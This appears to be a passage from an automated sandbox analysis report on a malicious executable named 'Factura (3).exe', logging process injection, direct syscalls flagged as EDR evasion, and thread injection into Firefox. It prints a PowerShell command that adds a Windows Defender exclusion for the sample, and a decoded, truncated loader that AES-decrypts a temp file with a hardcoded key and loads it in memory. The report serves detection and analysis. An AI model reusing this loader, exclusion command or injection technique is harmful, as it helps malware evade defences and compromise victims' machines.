            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054750D9 mov eax, dword ptr fs:[00000030h]14_2_054750D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D909C mov eax, dword ptr fs:[00000030h]14_2_053D909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A5096 mov eax, dword ptr fs:[00000030h]14_2_053A5096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CD090 mov eax, dword ptr fs:[00000030h]14_2_053CD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CD090 mov eax, dword ptr fs:[00000030h]14_2_053CD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A208A mov eax, dword ptr fs:[00000030h]14_2_053A208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539D08D mov eax, dword ptr fs:[00000030h]14_2_0539D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539C0F0 mov eax, dword ptr fs:[00000030h]14_2_0539C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E20F0 mov ecx, dword ptr fs:[00000030h]14_2_053E20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A80E9 mov eax, dword ptr fs:[00000030h]14_2_053A80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C50E4 mov eax, dword ptr fs:[00000030h]14_2_053C50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C50E4 mov ecx, dword ptr fs:[00000030h]14_2_053C50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539A0E3 mov ecx, dword ptr fs:[00000030h]14_2_0539A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C90DB mov eax, dword ptr fs:[00000030h]14_2_053C90DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov ecx, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov ecx, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov ecx, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov ecx, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]14_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054660B8 mov eax, dword ptr fs:[00000030h]14_2_054660B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054660B8 mov ecx, dword ptr fs:[00000030h]14_2_054660B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05475341 mov eax, dword ptr fs:[00000030h]14_2_05475341
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05397330 mov eax, dword ptr fs:[00000030h]14_2_05397330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546A352 mov eax, dword ptr fs:[00000030h]14_2_0546A352
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734101404 GetProcessHeap,6_2_00007FF734101404
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E7EF4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7340E7EF4
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340EE0B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7340EE0B0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E809C SetUnhandledExceptionFilter,6_2_00007FF7340E809C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E8108 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7340E8108

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -ForceJump to behavior
            Encrypted powershell cmdline option found
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: Base64 decoded [System.Threading.Thread]::Sleep(5000)$@5<5==0O0?:0 = [System.IO.Path]::GetTempPath()$(01;>= = 'file-*.putik'$>A;54=89$09; = Get-ChildItem -Path $@5<5==0O0?:0 -Filter $(01;>= | Sort-Object LastWriteTime -Descending | Select-Object -First 1function 0AH8D@>20BL { param ( [byte[]]$;NG, [byte[]]$=8F80;878@CNI895:B>@, [byte[]]$0==K5 ) $(8D@0B>@ = [System.Security.Cryptography.Aes]::Create() $(8D@0B>@.Mode = [System.Security.Cryptography.CipherMode]::CBC $(8D@0B>@.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $ 0AH8D@>2I8: = $(8D@0B>@.CreateDecryptor($;NG, $=8F80;878@CNI895:B>@) $ 0AH8D@>20==K50==K5 = $ 0AH8D@>2I8:.TransformFinalBlock($0==K5, 0, $0==K5.Length) return $ 0AH8D@>20==K50==K5}$;NG = [byte[]]@(0x50, 0xB0, 0x5B, 0x3D, 0x71, 0x80, 0xA7, 0xDC, 0xA8, 0x5C, 0x26, 0x9A, 0x7B, 0x92, 0xDD, 0xE7, 0x76, 0xD0, 0xCF, 0x42, 0x90, 0xBB, 0x6F, 0x5F, 0xC4, 0xB8, 0x1D, 0xA6, 0xBE, 0xE4, 0x6C, 0x35)$=8F80;878@CNI895:B>@ = [byte[]]@(0xE7, 0x99, 0x21, 0x27, 0x5A, 0x2D, 0x31, 0x53, 0x0E, 0xBB, 0xE4, 0xEE, 0x2B, 0x94, 0xE3, 0x0C)if ($>A;54=89$09; -ne $null) { $CBL$09;0 = $>A;54=89$09;.FullName $0H8D@>20==K509BK = [System.IO.File]::ReadAllBytes($CBL$09;0); $ 0AH8D@>20==>5!>45@68<>5 = 0AH8D@>20BL -;NG $;NG -=8F80;878@CNI895:B>@ $=8F80;878@CNI895:B>@ -0==K5 $0H8D@>20==K509BK $!1>@:0 = [System.Reflection.Assembly]::Load([byte[]]@($ 0AH8D@>20==>5!>45@68<
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: Base64 decoded [System.Threading.Thread]::Sleep(5000)$@5<5==0O0?:0 = [System.IO.Path]::GetTempPath()$(01;>= = 'file-*.putik'$>A;54=89$09; = Get-ChildItem -Path $@5<5==0O0?:0 -Filter $(01;>= | Sort-Object LastWriteTime -Descending | Select-Object -First 1function 0AH8D@>20BL { param ( [byte[]]$;NG, [byte[]]$=8F80;878@CNI895:B>@, [byte[]]$0==K5 ) $(8D@0B>@ = [System.Security.Cryptography.Aes]::Create() $(8D@0B>@.Mode = [System.Security.Cryptography.CipherMode]::CBC $(8D@0B>@.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $ 0AH8D@>2I8: = $(8D@0B>@.CreateDecryptor($;NG, $=8F80;878@CNI895:B>@) $ 0AH8D@>20==K50==K5 = $ 0AH8D@>2I8:.TransformFinalBlock($0==K5, 0, $0==K5.Length) return $ 0AH8D@>20==K50==K5}$;NG = [byte[]]@(0x50, 0xB0, 0x5B, 0x3D, 0x71, 0x80, 0xA7, 0xDC, 0xA8, 0x5C, 0x26, 0x9A, 0x7B, 0x92, 0xDD, 0xE7, 0x76, 0xD0, 0xCF, 0x42, 0x90, 0xBB, 0x6F, 0x5F, 0xC4, 0xB8, 0x1D, 0xA6, 0xBE, 0xE4, 0x6C, 0x35)$=8F80;878@CNI895:B>@ = [byte[]]@(0xE7, 0x99, 0x21, 0x27, 0x5A, 0x2D, 0x31, 0x53, 0x0E, 0xBB, 0xE4, 0xEE, 0x2B, 0x94, 0xE3, 0x0C)if ($>A;54=89$09; -ne $null) { $CBL$09;0 = $>A;54=89$09;.FullName $0H8D@>20==K509BK = [System.IO.File]::ReadAllBytes($CBL$09;0); $ 0AH8D@>20==>5!>45@68<>5 = 0AH8D@>20BL -;NG $;NG -=8F80;878@CNI895:B>@ $=8F80;878@CNI895:B>@ -0==K5 $0H8D@>20==K509BK $!1>@:0 = [System.Reflection.Assembly]::Load([byte[]]@($ 0AH8D@>20==>5!>45@68<Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtSetInformationThread: Direct from: 0x77542ECCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQueryValueKey: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtOpenKeyEx: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: NULL target: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: NULL target: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 1544Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkdsk.exeThread APC queued: target process: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\calc.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\calc.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 7EF008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -ForceJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedcommand wwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoauwbsaguazqbwacganqawadaamaapaaoacgakabieqaq1bdwenqq9bd0emarpbb8emaq/bdoemaqgad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabuaguabqbwafaayqb0aggakaapaaoajaaobdaemqq7bd4epqqgad0aiaanagyaaqbsagualqaqac4acab1ahqaaqbraccacgakab8epgrbbdsenqq0bd0eoaq5bcqemaq5bdseiaa9acaarwblahqalqbdaggaaqbsagqasqb0aguabqagac0auabhahqaaaagacqaegrabduepaq1bd0epqqwbe8ehwqwbd8eogqwbcaalqbgagkabab0aguacgagacqakaqwbdeeowq+bd0eiab8acaauwbvahiadaatae8aygbqaguaywb0acaatabhahmadabxahiaaqb0aguavabpag0azqagac0arablahmaywblag4azabpag4azwagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbgagkacgbzahqaiaaxaaoacgbmahuabgbjahqaaqbvag4aiaagbdaeqqribdgerarabd4emgqwbeietaqgahsacgagacaaiaagahaayqbyageabqagacgacgagacaaiaagacaaiaagacaawwbiahkadablafsaxqbdacqaggq7be4erwqsaaoaiaagacaaiaagacaaiaagafsaygb5ahqazqbbaf0axqakabgepqq4beyeoaqwbdseoaq3bdgeqardbe4esqq4bdkeegq1bdoeqgq+beaelaakacaaiaagacaaiaagacaaiabbagiaeqb0aguawwbdaf0ajaaubdaepqq9besenqqkacaaiaagacaakqakaaoaiaagacaaiaakacgeoarebeaemarcbd4eqaqgad0aiabbafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkalgbbaguacwbdadoaogbdahiazqbhahqazqaoackacgagacaaiaagacqakaq4beqeqaqwbeiepgrabc4atqbvagqazqagad0aiabbafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkalgbdagkacaboaguacgbnag8azablaf0aoga6aemaqgbdaaoaiaagacaaiaakacgeoarebeaemarcbd4eqaquafaayqbkagqaaqbuagcaiaa9acaawwbtahkacwb0aguabqauafmazqbjahuacgbpahqaeqauaemacgb5ahaadabvagcacgbhahaaaab5ac4auabhagqazabpag4azwbnag8azablaf0aoga6afaaswbdafmanwakaaoaiaagacaaiaakacaemarbbegeoarebeaepgqybekeoaq6bcaapqagacqakaq4beqeqaqwbeiepgrabc4aqwbyaguayqb0aguarablagmacgb5ahaadabvahiakaakaboeowrobecelaagacqagaq9bdgergq4bdaeowq4bdceoarabemetgrjbdgeoqqsbdueogrcbd4eqaqpaaoaiaagacaaiaakacaemarbbegeoarebeaepgqybdaepqq9besenqqubdaepqq9besenqqgad0aiaakacaemarbbegeoarebeaepgqybekeoaq6bc4avabyageabgbzagyabwbyag0argbpag4ayqbsaeiababvagmaawaoacqafaqwbd0epqrlbduelaagadaalaagacqafaqwbd0epqrlbduelgbmaguabgbnahqaaaapaaoacqakacaaiaagacaacgblahqadqbyag4aiaakacaemarbbegeoarebeaepgqybdaepqq9besenqqubdaepqq9besenqqkah0acgakacqaggq7be4erwqgad0aiabbagiaeqb0aguawwbdaf0aqaaoadaaeaa1adaalaagadaaeabcadaalaagadaaeaa1aeialaagadaaeaazaeqalaagadaaea